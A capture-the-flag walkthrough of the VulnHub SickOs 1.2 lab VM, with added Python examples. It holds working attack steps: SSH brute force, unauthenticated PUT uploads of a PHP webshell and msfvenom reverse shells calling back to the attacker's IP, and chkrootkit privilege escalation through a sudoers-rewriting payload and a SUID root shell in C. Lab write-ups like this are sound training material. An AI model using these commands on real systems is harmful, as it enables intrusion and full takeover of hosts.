SickOs 1.2 target VM (VulnHub)
For personal entertainment only
Target information
靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
I. Host discovery
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-87e4962320969021.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
II. Port scan
1. masscan --rate=10000 -p0-65535 192.168.181.133
![](https://upload-images.jianshu.io/upload_images/4664072-0374b72983d251a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
III. Service identification
nmap -sV -n 192.168.181.133
![](https://upload-images.jianshu.io/upload_images/4664072-66c1b775d5cf772f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
IV. Vulnerability discovery and exploitation
1. Visiting http://192.168.181.133 in a browser shows a login page. Directory brute-forcing turned up little of use:
dirb http://192.168.181.133 /usr/share/dirb/wordlists/big.txt
![](https://upload-images.jianshu.io/upload_images/4664072-65a2887ffba1d813.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-941d439c41f6798d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. The one hit worth a look is http://192.168.181.133/test/
![](https://upload-images.jianshu.io/upload_images/4664072-a6624f85703a0a52.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
1. SSH brute force
3. The SSH banner shows OpenSSH 5.9p1, a version affected by username enumeration. Enumerating users with the msf module (auxiliary/scanner/ssh/ssh_enumusers) gave the users john and root.
searchsploit openssh
![](https://upload-images.jianshu.io/upload_images/4664072-93858d87dbcf155f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
search openssh (in msfconsole)
![](https://upload-images.jianshu.io/upload_images/4664072-3a9091e4e9d9189e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0650533a59eb35a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4. Brute-force SSH with hydra; the root password was recovered.
![](https://upload-images.jianshu.io/upload_images/4664072-ca6204d09b797f4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5. The web server identifies itself as lighttpd 1.4.28
searchsploit lighttpd turns up nothing usable against this version.
![](https://upload-images.jianshu.io/upload_images/4664072-ff9b6e62a4a2bb92.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6. Check which HTTP methods /test accepts (the script argument is http-methods.url-path; the default path is /):
nmap 192.168.181.133 --script http-methods --script-args http-methods.url-path="/test"
![](https://upload-images.jianshu.io/upload_images/4664072-00203ee9be048020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Getshell method 1: Caidao (China Chopper) webshell
2. Capture the request in Burp and change the method to OPTIONS
Alternatively, intercept a request to /test/ in Burp, change the request method to OPTIONS and read the Allow header in the response to see which HTTP methods the directory supports.
![](https://upload-images.jianshu.io/upload_images/4664072-77796b7a2a3bc843.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
7. PUT an HTML file as a test; the upload really does succeed (a PUT to a path that does not exist yet is answered with 201 Created):
![](https://upload-images.jianshu.io/upload_images/4664072-4b5c003065bbe1f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
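The OPTIONS-then-PUT check above, done programmatically. This is an added example, not tooling from the walkthrough: the client functions do what the nmap http-methods script, the Burp OPTIONS request and curl -T do by hand, and the FakeDavDir class is a constructed in-process stand-in for a WebDAV-enabled directory with no authentication (it is not lighttpd; its status codes, Allow list and the /test/ path are assumptions chosen to mirror the page) so the script runs offline. A 201 on a fresh filename is the proof that the directory is writable; a 200 or 204 on the same name means overwrite is allowed too, and 403/405 means PUT is refused.

```python
"""Probe a web directory for unauthenticated HTTP PUT and upload through it.
Added example. The server below is a constructed stand-in, not lighttpd."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def _open(host, port):
    return http.client.HTTPConnection(host, port, timeout=5)


def allowed_methods(host, port, path):
    """OPTIONS request; returns the methods named in the Allow header."""
    conn = _open(host, port)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        resp.read()
        allow = resp.getheader("Allow") or ""
    finally:
        conn.close()
    return sorted({m.strip().upper() for m in allow.split(",") if m.strip()})


def put_file(host, port, path, data):
    """PUT data to path; returns the status: 201 created, 200/204 overwritten,
    403/405 refused. Content-Length is sent explicitly and no Expect header,
    the same reason the walkthrough passes -H 'Expect:' to curl."""
    conn = _open(host, port)
    try:
        conn.request("PUT", path, body=data,
                     headers={"Content-Length": str(len(data))})
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


def fetch(host, port, path):
    """GET path; returns (status, body) to confirm the upload is served back."""
    conn = _open(host, port)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def probe_and_upload(host, port, directory, filename, data):
    """Check Allow first, then PUT a fresh name; 201 proves the directory is writable."""
    methods = allowed_methods(host, port, directory)
    if "PUT" not in methods:
        return {"methods": methods, "put_status": None, "served_back": False}
    target = directory.rstrip("/") + "/" + filename
    status = put_file(host, port, target, data)
    return {"methods": methods, "put_status": status,
            "served_back": fetch(host, port, target) == (200, data)}


class FakeDavDir(BaseHTTPRequestHandler):
    """Constructed target: PUT allowed without auth, uploads kept in memory.
    Assumed codes: 201 on create, 204 on overwrite (both permitted by RFC 4918)."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _reply(self, status, body=b"", **headers):
        self.send_response(status)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, Allow="GET, HEAD, OPTIONS, PUT, DELETE, PROPFIND")

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        created = self.path not in self.server.store
        self.server.store[self.path] = body
        self._reply(201 if created else 204)

    def do_GET(self):
        body = self.server.store.get(self.path)
        self._reply(200 if body is not None else 404, body or b"")


def start_fake_server():
    """Bind the stand-in on an ephemeral loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeDavDir)
    srv.store = {}
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    """Probe the stand-in's /test/, then PUT the same name again to see the overwrite code."""
    srv, port = start_fake_server()
    try:
        result = probe_and_upload("127.0.0.1", port, "/test/", "probe.txt", b"hello")
        result["overwrite_status"] = put_file("127.0.0.1", port, "/test/probe.txt", b"again")
    finally:
        srv.shutdown()
        srv.server_close()
    return result


if __name__ == "__main__":
    print(demo())
```

Against a real target, point probe_and_upload at the host and the /test/ path instead of the stand-in; on a hardened server the same function returns 405 or 403 from put_file (or no PUT in the Allow list), which is the quick way to verify a fix.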
3. Getshell method 1: Caidao
8. PUT a PHP one-liner webshell (the eval-based one-liner Caidao connects to) into /test/
![](https://upload-images.jianshu.io/upload_images/4664072-27731feba15fb4b4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
9. From Caidao, upload a PHP reverse shell with the callback IP and port filled in. Use port 443: the target's firewall blocks outbound connections to uncommon ports.
Alternatively:
4. Use php-reverse-shell.php
10. Copy php-reverse-shell.php (shipped with Kali under /usr/share/webshells/php/) to the host machine, rename it 1.php and edit the listener address and port:
IP: 192.168.181.128
Port: 443 (note: with another high port the shell never connects back, because the target's firewall filters outbound traffic to it; the listener itself starts fine, the callback is what gets dropped)
![](https://upload-images.jianshu.io/upload_images/4664072-b459dae632a87e00.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-905a385494215f57.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-606a6ff0dfdd83dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
11. Check the distribution and kernel version
![](https://upload-images.jianshu.io/upload_images/4664072-81091bb1371fb72d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Getshell method 2: msfvenom reverse shell uploaded with curl
1. Generate a PHP Meterpreter reverse shell with msfvenom (LHOST is the Kali box; LPORT 443 because of the egress filtering noted above)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.181.128 LPORT=443 -f raw > shell.php
![](https://upload-images.jianshu.io/upload_images/4664072-a1f45e28c7e84037.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. Upload the generated shell to the target with curl (-T issues a PUT; -H 'Expect:' suppresses the Expect: 100-continue header curl adds for larger bodies, which lighttpd 1.4 answers with 417 Expectation Failed)
curl -v -H 'Expect:' -T shell.php "http://192.168.181.133/test/"
![](https://upload-images.jianshu.io/upload_images/4664072-e36d7b3e95e09398.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Start the handler in msf (payload, LHOST and LPORT must match the msfvenom options)
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.181.128
set lport 443
exploit -j
Confirm the listener is bound:
sudo netstat -plnt
![](https://upload-images.jianshu.io/upload_images/4664072-375552e7bdbfebb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4. Request the uploaded shell to trigger it
curl -v "http://192.168.181.133/test/shell.php"
A Meterpreter session opens on the handler (the request itself hangs while the shell runs):
![](https://upload-images.jianshu.io/upload_images/4664072-6d9e90ece0bc3b44.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6e70675a166be6a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
V. Privilege escalation
lsb_release -a
ls -la /etc/cron*
/etc/cron.daily: (the listing contains a chkrootkit job, so chkrootkit runs daily as root)
![](https://upload-images.jianshu.io/upload_images/4664072-6d9651bc559a8e5a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8cc4abfcd70430cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Look up known vulnerabilities for chkrootkit
![](https://upload-images.jianshu.io/upload_images/4664072-d8f578820cd76df7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-52d71e075dfea2fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
chkrootkit has a local privilege escalation bug: whenever it runs (here daily from cron, as root) it executes /tmp/update if that file exists, so anything www-data writes there runs as root.
Method 1: add the current user www-data to the sudoers list
Create an empty file named update in /tmp:
cd /tmp
touch update
ls -l
![](https://upload-images.jianshu.io/upload_images/4664072-7dd80373692c52b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Make update executable:
chmod +x /tmp/update
![](https://upload-images.jianshu.io/upload_images/4664072-b111d6c0fc7dd2a7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Write the payload that will add www-data to sudoers: it makes /etc/sudoers writable and appends a NOPASSWD entry. chmod +w without a who-letter honours root's umask (u+w with the usual 022), which is what you want here, since sudo refuses a world-writable sudoers file.
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
Once the daily chkrootkit run has executed /tmp/update as root, www-data can switch to root without a password:
sudo su root
![](https://upload-images.jianshu.io/upload_images/4664072-cc76ccf12b793bce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
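Why a plain file in /tmp is enough for the escalation described above and used by method 1: chkrootkit 0.49 (CVE-2014-0476) builds a list of suspicious paths in its slapper() check and appends each existing one to a variable with the unquoted shell line `file_port=$file_port $i`. Because file_port is empty, the shell parses that as "run $i with file_port set in its environment", so /tmp/update is executed as the user running chkrootkit, which under cron is root. The script below is an added example, not code from the page or from chkrootkit: VULNERABLE is a reduced, constructed model of that loop (not the verbatim source), FIXED is the same loop with the quoting change that chkrootkit 0.50 shipped, and both are run by /bin/sh against a scratch ROOTDIR so nothing touches the real /tmp. The marker file name and the check.sh wrapper are assumptions of the example.

```python
"""Reproduce the chkrootkit /tmp/update execution bug in a scratch directory.
Added example: VULNERABLE models the 0.49 loop, FIXED carries the 0.50 quoting."""
import os
import subprocess
import tempfile

# Reduced model of chkrootkit's slapper() check (constructed, not the real source).
# `file_port=$file_port $i` with an empty file_port is a command, not an assignment:
# the shell runs $i with file_port="" in its environment.
VULNERABLE = """\
slapper () {
   SLAPPER_FILES="${ROOTDIR}tmp/update"
   file_port=
   for i in ${SLAPPER_FILES}; do
      if [ -f ${i} ]; then
         file_port=$file_port $i
      fi
   done
   echo "file_port=[$file_port]"
}
slapper
"""

# The fix: quote the right-hand side so the line is an assignment again.
FIXED = VULNERABLE.replace('file_port=$file_port $i', 'file_port="$file_port $i"')


def run_check(script_text, rootdir):
    """Run the check with ROOTDIR pointing at rootdir.
    Returns True if <rootdir>/tmp/update was executed (it leaves a marker)."""
    marker = os.path.join(rootdir, "executed.marker")
    tmp = os.path.join(rootdir, "tmp")
    os.makedirs(tmp, exist_ok=True)
    update = os.path.join(tmp, "update")
    with open(update, "w") as f:
        # A shebang is used here for robustness; the walkthrough's shebang-less
        # /tmp/update also runs, via the shell's ENOEXEC fallback to /bin/sh.
        f.write("#!/bin/sh\ntouch '%s'\n" % marker)
    os.chmod(update, 0o755)
    check = os.path.join(rootdir, "check.sh")
    with open(check, "w") as f:
        f.write(script_text)
    env = dict(os.environ, ROOTDIR=rootdir + "/")  # chkrootkit joins ROOTDIR and tmp/update
    subprocess.run(["/bin/sh", check], env=env, check=True, stdout=subprocess.DEVNULL)
    return os.path.exists(marker)


def demo():
    """Run both variants in fresh scratch trees; returns {variant: executed?}."""
    results = {}
    for name, text in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        with tempfile.TemporaryDirectory() as d:
            results[name] = run_check(text, d)
    return results


if __name__ == "__main__":
    print(demo())
```

Seen from the defender's side the same harness is a regression test: point run_check at the real script's slapper() body (with ROOTDIR overridden as here) and the marker must stay absent. The C program in method 3 below relies on exactly this trigger for its first, root-level run.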
Privesc method 2: exploit database and Metasploit module
1. Search exploit-db (searchsploit chkrootkit) for the chkrootkit bug
![](https://upload-images.jianshu.io/upload_images/4664072-f13a8165259d56cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2. In msf, use the matching local exploit together with the session already obtained
![](https://upload-images.jianshu.io/upload_images/4664072-2b07840d35a83c93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. Use the exploit/unix/local/chkrootkit module for the local escalation and set its options (SESSION must point at the existing session; the module plants /tmp/update itself and waits for chkrootkit's next run)
![](https://upload-images.jianshu.io/upload_images/4664072-6f8dc06383755849.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4. Run the exploit; it succeeds once chkrootkit has run and returns a root session
![](https://upload-images.jianshu.io/upload_images/4664072-794f4d47a415cd09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Privesc method 3: a SUID root shell built from shell.c
1. Write shell.c, to be compiled as /tmp/update
On Kali, write shell.c (the original lacked stdlib.h for system() and declared main as void; both fixed, behaviour unchanged):
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid(), execl() */

/* Compiled to /tmp/update. First run: chkrootkit (cron, root) executes it and the
 * two system() calls turn the binary into a root-owned SUID executable (chown first,
 * then chmod, because chown clears the setuid bit). Every later run as www-data
 * then has euid 0, becomes fully root and execs a shell. */
int main(void)
{
    system("chown root:root /tmp/update");
    system("chmod 4755 /tmp/update");
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", NULL);
    return 1;   /* only reached if execl fails */
}
![](https://upload-images.jianshu.io/upload_images/4664072-61f928c8a82b803c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Upload shell.c to the target with the same PUT as before:
curl -v -H "Expect:" -T shell.c http://192.168.181.133/test/
![](https://upload-images.jianshu.io/upload_images/4664072-d422baa604798958.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
On the target, copy the uploaded source into /tmp:
cd /var/www/test
ls
cp shell.c /tmp/shell.c
cd /tmp
![](https://upload-images.jianshu.io/upload_images/4664072-8f82d6e9dd8f84f5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)